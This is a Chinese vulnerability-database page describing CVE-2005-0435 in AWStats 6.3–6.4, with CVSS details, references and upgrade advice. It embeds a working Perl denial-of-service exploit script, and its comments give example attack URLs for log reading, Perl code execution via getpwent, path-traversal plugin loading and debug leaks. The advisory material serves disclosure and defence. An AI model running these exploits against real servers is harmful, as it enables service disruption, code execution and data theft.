CVE-2005-0435
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:46:16
NMCOE    

[原文]awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to read server web logs by setting the loadplugin and pluginmode parameters to rawlog.


[CNNVD]AWStats awstats.pl 信息泄露漏洞(CNNVD-200505-303)

        AWStats 6.3和6.4的awstats.pl允许远程攻击者通过向rawlog设置loadplugin和pluginmode参数来读取服务器Web日志文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:awstats:awstats:6.4
cpe:/a:awstats:awstats:6.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0435
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0435
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-303
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/14299
(VENDOR_ADVISORY)  SECUNIA  14299
http://xforce.iss.net/xforce/xfdb/19333
(UNKNOWN)  XF  awstats-awstatpl-obtain-information(19333)
http://www.securityfocus.com/archive/1/390368
(VENDOR_ADVISORY)  BUGTRAQ  20050214 AWStats <= 6.4 Multiple vulnerabilities

- 漏洞信息

AWStats awstats.pl 信息泄露漏洞
中危 未知
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        AWStats 6.3和6.4的awstats.pl允许远程攻击者通过向rawlog设置loadplugin和pluginmode参数来读取服务器Web日志文件。

- 公告与补丁

        暂无数据

- 漏洞信息 (817)

AwStats <= 6.4 Denial Of Service (with Advisory) (EDBID:817)
cgi webapps
2005-02-14 Verified
0 GHC
[点击下载] [点击下载]
#!/usr/bin/perl
# 
# 
# Summarized the advisory www.ghc.ru GHC: /str0ke
#											
# [0] Exploitable example (raw log plugin):						
#    Attacker can read sensitive information						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog	
#											
# [1] Perl code execution. (This script)						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent		
#											
# [2] Arbitrary plugin including.							
# 											
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#											
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).	
#    Every user can access debug function:						
#											
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1					
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2                                  
#											
# Be sure to change the $server + /cgi-bin location /str0ke				
#											

use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}

while () {
$rp = rand;
&ConnectServer;
}

# milw0rm.com [2005-02-14]
		

- 漏洞信息

13831
AWStats rawlog Plugin Information Disclosure
Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-14 Unknow
2005-02-14 Unknow

- 解决方案

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站